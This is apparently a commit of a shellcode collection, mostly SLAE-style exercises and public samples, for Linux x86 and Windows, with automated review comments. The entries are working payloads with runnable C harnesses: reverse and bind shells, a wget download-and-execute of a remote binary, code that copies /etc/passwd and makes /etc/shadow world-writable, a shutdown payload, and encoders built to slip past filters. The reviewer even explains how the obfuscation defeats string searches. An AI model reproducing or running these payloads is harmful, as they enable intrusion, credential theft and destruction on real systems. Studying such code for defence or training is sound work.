inc ebx
push DWORD 0x0101017f ;127.1.1.1
push WORD 0x3930 ; Port 12345
push WORD bx
mov ecx, esp
push BYTE 16
push ecx
push esi
mov ecx, esp
inc ebx
int 0x80
; dup2
mov esi, eax
push BYTE 0x1
pop ecx
mov BYTE al, 0x3F
int 0x80
;read the file
jmp short call_shellcode
shellcode:
push 0x5
pop eax
pop ebx
xor ecx,ecx
int 0x80
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
xor edx,edx
mov dh,0xff
mov dl,0xff
int 0x80
mov edx,eax
push 0x4
pop eax
mov bl, 0x1
int 0x80
push 0x1
pop eax
inc ebx
int 0x80
call_shellcode:
call shellcode
message db "/etc/passwd"
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
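
Review bot: the `; dup2` comment does not match the registers in use when that call is made. `mov esi, eax` replaces the descriptor saved after `socket` with the return value of `connect`, and the `0x3F` call then runs with `ebx` still holding 3 from the preceding `inc ebx`, so descriptor 1 is redirected to the socket only when the socket is descriptor 3 and `connect` returned 0. State that assumption in the comment. The header also misspells "received", and the harness should print the length with `sizeof(code)-1` and `%zu` rather than `strlen` on an `unsigned char` array with `%d`.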

@ -0,0 +1,95 @@
/*
; Filename: downloadexec.nasm
; Author: Daniel Sauder
; Website: http://govolution.wordpress.com/
; Tested on: Ubuntu 12.04 / 32Bit
; License: http://creativecommons.org/licenses/by-sa/3.0/
; Shellcode:
; - download 192.168.2.222/x with wget
; - chmod x
; - execute x
; - x is an executable
; - length 108 bytes
global _start
section .text
_start:
;fork
xor eax,eax
mov al,0x2
int 0x80
xor ebx,ebx
cmp eax,ebx
jz child
;wait(NULL)
xor eax,eax
mov al,0x7
int 0x80
;chmod x
xor ecx,ecx
xor eax, eax
push eax
mov al, 0xf
push 0x78
mov ebx, esp
xor ecx, ecx
mov cx, 0x1ff
int 0x80
;exec x
xor eax, eax
push eax
push 0x78
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
child:
;download 192.168.2.222//x with wget
push 0xb
pop eax
cdq
push edx
push 0x782f2f32 ;2//x avoid null byte
push 0x32322e32 ;22.2
push 0x2e383631 ;.861
push 0x2e323931 ;.291
mov ecx,esp
push edx
push 0x74 ;t
push 0x6567772f ;egw/
push 0x6e69622f ;nib/
push 0x7273752f ;rsu/
mov ebx,esp
push edx
push ecx
push ebx
mov ecx,esp
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\x68\x32\x2f\x2f\x78\x68\x32\x2e\x32\x32\x68\x31\x36\x38\x2e\x68\x31\x39\x32\x2e\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
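
Review bot: the behaviour list in the header says `chmod x` without the mode, while the `;chmod x` block loads `cx` with `0x1ff`, that is 0777, and applies it to the relative path `x`. Record the mode and the fact that the path is resolved against the current working directory, since those are the two details a file-integrity or audit rule would key on.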

@ -0,0 +1,41 @@
;Description: JMP-CALL-POP execve shell (52 bytes)
;Shellcode: \xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
global _start
section .text
_start:
jmp short here
me:
pop esi
mov edi,esi
xor eax,eax
push eax
mov edx,esp
push eax
add esp,3
lea esi,[esi +4]
xor eax,[esi]
push eax
xor eax,eax
xor eax,[edi]
push eax
mov ebx,esp
xor eax,eax
push eax
lea edi,[ebx]
push edi
mov ecx,esp
mov al,0xb
int 0x80
here:
call me
path db "//bin/sh"
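
Review bot: `add esp,3` directly after the second `push eax` has no comment, and it is the step the whole string layout depends on. It moves `esp` so that the two dwords read from `path` are pushed immediately below a single zero byte left by that `push eax`, which is what terminates `//bin/sh` on the stack. A one-line comment saying so would make the routine readable, along with a note of what `ebx`, `ecx` and `edx` hold at `int 0x80`.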

@ -0,0 +1,52 @@
;Description: Copy /etc/passwd to /tmp/outfile (97 bytes)
;Shellcode: \x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd\x80
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
global _start
section .text
_start:
xor eax,eax
mov al,0x5
xor ecx,ecx
push ecx
push 0x64777373
push 0x61702f63
push 0x74652f2f
lea ebx,[esp +1]
int 0x80
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
push WORD 0xffff
pop edx
int 0x80
mov esi,eax
push 0x5
pop eax
xor ecx,ecx
push ecx
push 0x656c6966
push 0x74756f2f
push 0x706d742f
mov ebx,esp
mov cl,0102o
push WORD 0644o
pop edx
int 0x80
mov ebx,eax
push 0x4
pop eax
mov ecx,edi
mov edx,esi
int 0x80
xor eax,eax
xor ebx,ebx
mov al,0x1
mov bl,0x5
int 0x80
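
Review bot: `push WORD 0xffff` followed by `pop edx` pushes two bytes and pops four, and `push WORD 0644o` / `pop edx` does the same further down. In both places the upper half of `edx` is filled from the path bytes already on the stack and `esp` ends two bytes higher than it started, so the read count and the file mode are not the values the source appears to set. Say in a comment what `edx` really holds at each call, or keep the operand sizes matched. Comments naming `0102o` as `O_CREAT|O_RDWR` and explaining the exit status 5 are also missing.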

@ -0,0 +1,75 @@
;author: Shihao Songss3695@drexel.edu
;decoding will be divided into two parts
;First, shift right to get the original shellcode with prefix "0xAA"
;Second, delete all the "0xAA" prefix and reformat the shellcode
; shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
; encode = ""
;
; for x in bytearray(shellcode) :
; if x < 128:
; x=x<<1
; encode += '0xAA,'
; encode += '0x'
; encode += '%02x,'%x
;
; print encode
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi ;now esi contains the address of encoded shellcode
mov edi, esi ;this is for formatting
decode:
mov bl, byte [esi]
xor bl, 0xBB ;bl is for testing end
jz formatting ;First step is done
mov cl, byte [esi]
xor cl, 0XAA
jz shift_decode
inc esi
jmp short decode
shift_decode:
mov dl, byte [esi + 1]
shr dl,1 ;shift next instruction
mov byte [esi + 1], dl
inc esi
jmp short decode
formatting:
mov eax, edi
mov bl, byte [eax]
xor bl, 0xBB ;now formatting complete
jz encoded ;starts to execute
format:
mov bl, byte [eax] ;bl is for testing end
mov cl, byte [eax] ;cl is for testing prefix
xor cl, 0xAA
jnz Next_Cycle
Cycle:
mov dl, byte [eax]
xor dl, 0xBB
jz Next_Cycle ;This cycle ends here
mov dl, byte [eax + 1]
mov byte [eax], dl
inc eax
jmp short Cycle
Next_Cycle:
inc edi
jmp short formatting
call_shellcode:
call decoder
encoded: db 0xAA,0x62,0xc0,0xAA,0xa0,0xAA,0xd0,0xAA,0x5e,0xAA,0x5e,0xAA,0xe6,0xAA,0xd0,0xAA,0xd0,0xAA,0x5e,0xAA,0xc4,0xAA,0xd2,0xAA,0xdc,0x89,0xe3,0xAA,0xa0,0x89,0xe2,0xAA,0xa6,0x89,0xe1,0xb0,0xAA,0x16,0xcd,0x80,0xBB
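
Review bot: the scheme's two reserved bytes are not documented, and the encoder in the comment has no check for them. `decode` treats every `0xAA` as a prefix and `0xBB` as the end marker, while the encoder copies bytes of 128 and above unchanged, so the description should state that neither value may occur in the input and name both markers at the top instead of leaving them only in the `xor` operands. The author line also runs the name and the address together (`Shihao Songss3695@drexel.edu`).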

@ -0,0 +1,15 @@
;Description: JMP-FSTENV execve shell (67 bytes)
;Shellcode: \xd9\xee\xeb\x34\xeb\x25\x5e\x89\xf7\x31\xc0\x50\x89\xe2\x50\x83\xc4\x03\x8d\x76\x04\x33\x06\x50\x31\xc0\x33\x07\x50\x89\xe3\x31\xc0\x50\x8d\x3b\x57\x89\xe1\xb0\x0b\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x9b\xd9\x74\x24\xf4\x59\x8d\x41\x04\xff\xe0
;Author: Paolo Stivanin <https://github.com/polslinux>
;SLAE ID: 526
global main
section .text
main:
fldz
jmp short here
message: db 0xeb,0x25,0x5e,0x89,0xf7,0x31,0xc0,0x50,0x89,0xe2,0x50,0x83,0xc4,0x03,0x8d,0x76,0x04,0x33,0x06,0x50,0x31,0xc0,0x33,0x07,0x50,0x89,0xe3,0x31,0xc0,0x50,0x8d,0x3b,0x57,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0xe8,0xd6,0xff,0xff,0xff,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
here: fstenv [esp-0xc]
pop ecx
lea eax,[ecx+4]
jmp eax
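
Review bot: the label `message` is misleading and the `+4` in `lea eax,[ecx+4]` is unexplained. The bytes under `message` are executable code, the same 52 bytes given as the JMP-CALL-POP stub by this author earlier in the commit, and `+4` is the combined length of `fldz` and `jmp short here`, which is how the address recovered through `fstenv` is turned into the address of that stub. Rename the label and comment the constant so the offset is not silently wrong after an edit to the first two instructions.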

@ -0,0 +1,48 @@
/*
; Title: chmod 0777 /etc/shadow (a bit obfuscated) Shellcode - 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
mov ebx, eax
xor eax, ebx
push dword eax
mov esi, 0x563a1f3e
add esi, 0x21354523
mov dword [esp-4], esi
mov dword [esp-8], 0x68732f2f
mov dword [esp-12], 0x6374652f
sub esp, 12
mov ebx,esp
push word 0x1ff
pop cx
mov al,0xf
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";
int
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}
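
Review bot: the `mov esi, 0x563a1f3e` / `add esi, 0x21354523` pair has no comment giving its result. The sum is `0x776f6461`, the bytes `adow`, so the three stores assemble `/etc//shadow` without that string appearing in the file; this is the "a bit obfuscated" part of the title and the reason a plain strings search over the bytes will not show the full path. Add the resolved value as a comment. In the harness, `strlen(code)` is printed with `%d`; use `%zu`.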

@ -0,0 +1,54 @@
/*
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 d2 xor edx,edx
8048064: 50 push eax
8048065: 66 68 2d 68 pushw 0x682d
8048069: 89 e7 mov edi,esp
804806b: 50 push eax
804806c: 6a 6e push 0x6e
804806e: 66 c7 44 24 01 6f 77 mov WORD PTR [esp+0x1],0x776f
8048075: 89 e7 mov edi,esp
8048077: 50 push eax
8048078: 68 64 6f 77 6e push 0x6e776f64
804807d: 68 73 68 75 74 push 0x74756873
8048082: 68 6e 2f 2f 2f push 0x2f2f2f6e
8048087: 68 2f 73 62 69 push 0x6962732f
804808c: 89 e3 mov ebx,esp
804808e: 52 push edx
804808f: 56 push esi
8048090: 57 push edi
8048091: 53 push ebx
8048092: 89 e1 mov ecx,esp
8048094: b0 0b mov al,0xb
8048096: cd 80 int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\x31\xc0\x31\xd2\x50\x66\x68\x2d"
"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
"\x44\x24\x01\x6f\x77\x89\xe7\x50"
"\x68\x64\x6f\x77\x6e\x68\x73\x68"
"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
"\x2f\x73\x62\x69\x89\xe3\x52\x56"
"\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
int
main() {
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}

@ -0,0 +1,75 @@
/*
* Title: Shell Bind TCP Shellcode Port 1337 - 89 bytes
* Platform: Linux/x86
* Date: 2014-07-13
* Author: Julien Ahrens (@MrTuxracer)
* Website: http://www.rcesecurity.com
*
* Disassembly of section .text:
* 00000000 <_start>:
* 0: 6a 66 push 0x66
* 2: 58 pop eax
* 3: 6a 01 push 0x1
* 5: 5b pop ebx
* 6: 31 f6 xor esi,esi
* 8: 56 push esi
* 9: 53 push ebx
* a: 6a 02 push 0x2
* c: 89 e1 mov ecx,esp
* e: cd 80 int 0x80
* 10: 5f pop edi
* 11: 97 xchg edi,eax
* 12: 93 xchg ebx,eax
* 13: b0 66 mov al,0x66
* 15: 56 push esi
* 16: 66 68 05 39 pushw 0x3905
* 1a: 66 53 push bx
* 1c: 89 e1 mov ecx,esp
* 1e: 6a 10 push 0x10
* 20: 51 push ecx
* 21: 57 push edi
* 22: 89 e1 mov ecx,esp
* 24: cd 80 int 0x80
* 26: b0 66 mov al,0x66
* 28: b3 04 mov bl,0x4
* 2a: 56 push esi
* 2b: 57 push edi
* 2c: 89 e1 mov ecx,esp
* 2e: cd 80 int 0x80
* 30: b0 66 mov al,0x66
* 32: 43 inc ebx
* 33: 56 push esi
* 34: 56 push esi
* 35: 57 push edi
* 36: 89 e1 mov ecx,esp
* 38: cd 80 int 0x80
* 3a: 59 pop ecx
* 3b: 59 pop ecx
* 3c: b1 02 mov cl,0x2
* 3e: 93 xchg ebx,eax
*
* 0000003f <loop>:
* 3f: b0 3f mov al,0x3f
* 41: cd 80 int 0x80
* 43: 49 dec ecx
* 44: 79 f9 jns 3f <loop>
* 46: b0 0b mov al,0xb
* 48: 68 2f 2f 73 68 push 0x68732f2f
* 4d: 68 2f 62 69 6e push 0x6e69622f
* 52: 89 e3 mov ebx,esp
* 54: 41 inc ecx
* 55: 89 ca mov edx,ecx
* 57: cd 80 int 0x80
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

@ -0,0 +1,62 @@
/*
* Title: Shell Reverse TCP Shellcode - 74 bytes
* Platform: Linux/x86
* Date: 2014-07-25
* Author: Julien Ahrens (@MrTuxracer)
* Website: http://www.rcesecurity.com
*
* Disassembly of section .text:
* 00000000 <_start>:
* 0: 6a 66 push 0x66
* 2: 58 pop eax
* 3: 6a 01 push 0x1
* 5: 5b pop ebx
* 6: 31 d2 xor edx,edx
* 8: 52 push edx
* 9: 53 push ebx
* a: 6a 02 push 0x2
* c: 89 e1 mov ecx,esp
* e: cd 80 int 0x80
* 10: 92 xchg edx,eax
* 11: b0 66 mov al,0x66
* 13: 68 7f 01 01 01 push 0x101017f <ip: 127.1.1.1
* 18: 66 68 05 39 pushw 0x3905 <port: 1337
* 1c: 43 inc ebx
* 1d: 66 53 push bx
* 1f: 89 e1 mov ecx,esp
* 21: 6a 10 push 0x10
* 23: 51 push ecx
* 24: 52 push edx
* 25: 89 e1 mov ecx,esp
* 27: 43 inc ebx
* 28: cd 80 int 0x80
* 2a: 6a 02 push 0x2
* 2c: 59 pop ecx
* 2d: 87 da xchg edx,ebx
*
* 0000002f <loop>:
* 2f: b0 3f mov al,0x3f
* 31: cd 80 int 0x80
* 33: 49 dec ecx
* 34: 79 f9 jns 2f <loop>
* 36: b0 0b mov al,0xb
* 38: 41 inc ecx
* 39: 89 ca mov edx,ecx
* 3b: 52 push edx
* 3c: 68 2f 2f 73 68 push 0x68732f2f
* 41: 68 2f 62 69 6e push 0x6e69622f
* 46: 89 e3 mov ebx,esp
* 48: cd 80 int 0x80
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

@ -0,0 +1,51 @@
# Title: Shellcode Linux x86 [54Bytes] Run /usr/bin/python | setreuid(),execve()
# Date: 8/5/2014
# Author: Ali Razmjoo
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
/*
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Shellcode Linux x86 Run /usr/bin/python | setreuid(),execve()
Shellcode Length: 54
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: b0 46 mov $0x46,%al
4: 31 db xor %ebx,%ebx
6: 31 c9 xor %ecx,%ecx
8: cd 80 int $0x80
a: eb 16 jmp 22 <last>
0000000c <first>:
c: 5b pop %ebx
d: 31 c0 xor %eax,%eax
f: 88 43 0f mov %al,0xf(%ebx)
12: 89 5b 10 mov %ebx,0x10(%ebx)
15: 89 43 14 mov %eax,0x14(%ebx)
18: b0 0b mov $0xb,%al
1a: 8d 4b 10 lea 0x10(%ebx),%ecx
1d: 8d 53 14 lea 0x14(%ebx),%edx
20: cd 80 int $0x80
00000022 <last>:
22: e8 e5 ff ff ff call c <first>
27: 2f das
28: 75 73 jne 9d <last+0x7b>
2a: 72 2f jb 5b <last+0x39>
2c: 62 69 6e bound %ebp,0x6e(%ecx)
2f: 2f das
30: 70 79 jo ab <last+0x89>
32: 74 68 je 9c <last+0x7a>
34: 6f outsl %ds:(%esi),(%dx)
35: 6e outsb %ds:(%esi),(%dx)
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x0f\x89\x5b\x10\x89\x43\x14\xb0\x0b\x8d\x4b\x10\x8d\x53\x14\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}
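
Review bot: the four `#` header lines above the `/*` are outside any comment, so a C compiler reads `# Title:` as a preprocessing directive and rejects the file. Move them inside the block comment. In the listing, the rows from offset 27 onward are the bytes of `/usr/bin/python` rendered as instructions and should be marked as data, and `strlen(sc)` needs `%zu` rather than `%d`.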

@ -0,0 +1,133 @@
/*
ROT-7 Decoder Shellcode - Linux Intel/x86
Author: Stavros Metzidakis
*/
a) Python ROT-7 encoder for shellcode (execve-stack)
---------------------------------------------------------------------------------------
#!/usr/bin/python
# Python ROT-7 Encoder
shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
if x > 248:
encoded += '\\x'
encoded += '%02x' %(7 -(256 - x))
encoded2 += '0x'
encoded2 += '%02x,' %(7 -(256 - x))
else:
encoded += '\\x'
encoded += '%02x'%(x+7)
encoded2 += '0x'
encoded2 += '%02x,' %(x+7)
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
---------------------------------------------------------------------------------------
Test run:
$ ./rot-7-encoder.py
Encoded shellcode ...
\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87
0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87,
Len: 30
b) Decoder for a ROT-7 encoded shellcode (execve-stack)
---------------------------------------------------------------------------------------
$objdump -d rot-7-decoder -M intel
rot-7-decoder: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 25 jmp 8048087 <call_decoder>
08048062 <decoder>:
8048062: 5e pop esi
8048063: 31 c9 xor ecx,ecx
8048065: b1 1e mov cl,0x1e ;ROTed shellcode length goes here
08048067 <decode>:
8048067: 80 3e 07 cmp BYTE PTR [esi],0x7
804806a: 7c 05 jl 8048071 <lowbound>
804806c: 80 2e 07 sub BYTE PTR [esi],0x7
804806f: eb 11 jmp 8048082 <common_commands>
08048071 <lowbound>:
8048071: 31 db xor ebx,ebx
8048073: 31 d2 xor edx,edx
8048075: b3 07 mov bl,0x7
8048077: b2 ff mov dl,0xff
8048079: 66 42 inc dx
804807b: 2a 1e sub bl,BYTE PTR [esi]
804807d: 66 29 da sub dx,bx
8048080: 88 16 mov BYTE PTR [esi],dl
08048082 <common_commands>:
8048082: 46 inc esi
8048083: e2 e2 loop 8048067 <decode>
8048085: eb 05 jmp 804808c <Shellcode>
08048087 <call_decoder>:
8048087: e8 d6 ff ff ff call 8048062 <decoder>
0804808c <Shellcode>: ;ROTed shellcode
804808c: 38 c7 cmp bh,al
804808e: 57 push edi
804808f: 6f outs dx,DWORD PTR ds:[esi]
8048090: 69 68 7a 6f 6f 69 70 imul ebp,DWORD PTR [eax+0x7a],0x70696f6f
8048097: 75 36 jne 80480cf <Shellcode+0x43>
8048099: 6f outs dx,DWORD PTR ds:[esi]
804809a: 36 ss
804809b: 36 ss
804809c: 36 ss
804809d: 36 ss
804809e: 90 nop
804809f: ea 57 90 e9 5a 90 e8 jmp 0xe890:0x5ae99057
80480a6: b7 12 mov bh,0x12
80480a8: d4 87 aam 0x87
---------------------------------------------------------------------------------------
$ cat shellcode.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = "\xeb\x25\x5e\x31\xc9\xb1\x1e\x80\x3e\x07\x7c\x05\x80\x2e\x07\xeb\x11\x31\xdb\x31\xd2\xb3\x07\xb2\xff\x66\x42\x2a\x1e\x66\x29\xda\x88\x16\x46\xe2\xe2\xeb\x05\xe8\xd6\xff\xff\xff\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
$ gcc ./shellcode.c -fno-stack-protector -z execstack -o shellcode
$ ./shellcode
Shellcode Length: 74
$
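
Review bot: the decoder's `jl 8048071 <lowbound>` at 804806a is a signed comparison, which neither the labels nor the comments mention. Every encoded byte of 0x80 or above compares as negative against 7 and takes the `lowbound` path, not only the values 0 to 6 that the encoder's `x > 248` branch produces; the result is still the byte minus 7 modulo 256, but the label names suggest a narrower case. Say so in a comment. The file also mixes a C comment, a Python 2 script, an objdump listing and a shell transcript with nothing a compiler or interpreter would accept as separation, so each part belongs in its own file or inside the comment block.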

@ -0,0 +1,239 @@
; Title: Win32 Bind Shell
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Function: Listen for connection and spawn command shell
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm
[BITS 32]
global _start
_start:
LCaller:
call LLoadFunctions
LDataSegment:
;========================
dd "CMD"
dd 0x79c679e7 ; closesocket 12
dd 0x498649e5 ; accept 16
dd 0xe92eada4 ; listen 20
dd 0xc7701aa4 ; bind 24
dd 0xadf509d9 ; WSASocketA 28
dd 0x3bfcedcb ; WSAStartup 32
dd 0xec0e4e8e ; LoadLibraryA 36
dd 0x73e2d87e ; ExitProcess 40
dd 0xce05d9ad ; WaitForSingleObject 44
dd 0x16b3fe72 ; CreateProcessA 48
db "WS2_32.DLL", 0x00, 0x01
;========================
LLoadFunctions:
pop ebx
push esp
mov ebp, esp
mov [ebp], ebx
LKernel32Base:
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebx, [eax + 0x08]
jmp short LStartLoading
LLoadWinsock:
lea edx, [edi + 44] ; get address of ws2_32.dll
push ecx ; save counter
push edx ; push address of ws2_32.dll
call eax ; LoadLibraryA()
mov ebx, eax ; save module handle
pop ecx ; restore counter
jmp short Looper2
LStartLoading:
; Start loading addresses at ebp + 12
push byte 0x08
pop esi
add esi, ebp
; Function counter
push byte 0x0a
pop ecx
mov edi, [ebp]
Looper:
cmp cl, 0x06
je short LLoadWinsock
Looper2:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx*4] ; function hash value
call LGetProcAddress ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
xor edi, edi
LWSAStartup:
; WSAStartup(0x101, DATA)
sub sp, 400
push esp
push 0x101
call [ebp + 32]
LWSASocketA:
; WSASocketA(2,1,0,0,0,0)
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call [ebp + 28]
mov ebx, eax ; save socket to ebx
xor edi, edi
LBind:
push edi
push edi
push dword 0x11220002 ; port 8721
mov esi, esp
push byte 0x10 ; length
push esi
push ebx
call [ebp + 24]
LListen:
push edi
push ebx
call [ebp + 20]
LAccept:
push edi
push esi
push ebx
call [ebp + 16]
mov edx, eax
LCreateProcessStructs:
; allocate space for STARTUPINFO, PROCESS_INFORMATION
sub sp, 0x54
; zero out SI/PI
lea edi, [esp]
xor eax, eax
push byte 21
pop ecx
LBZero:
rep stosd
mov edi, edx
mov byte [esp + 16], 68 ; si.cb = sizeof(si)
inc byte [esp + 61] ; si.dwFlags = 0x100
; socket handles
mov [esp + 16 + 56], edi
mov [esp + 16 + 60], edi
mov [esp + 16 + 64], edi
lea eax, [esp + 16] ; si
push esp ; pi
push eax
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push dword [ebp]
push ecx
LCreateProcess:
call [ebp + 48]
mov ecx, esp
LWaitForSingleObject:
push 0xFFFFFFFF
push dword [ecx]
call [ebp + 44]
LCloseSocket:
push edi
call [ebp + 12]
LFinished:
call [ebp + 40]
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
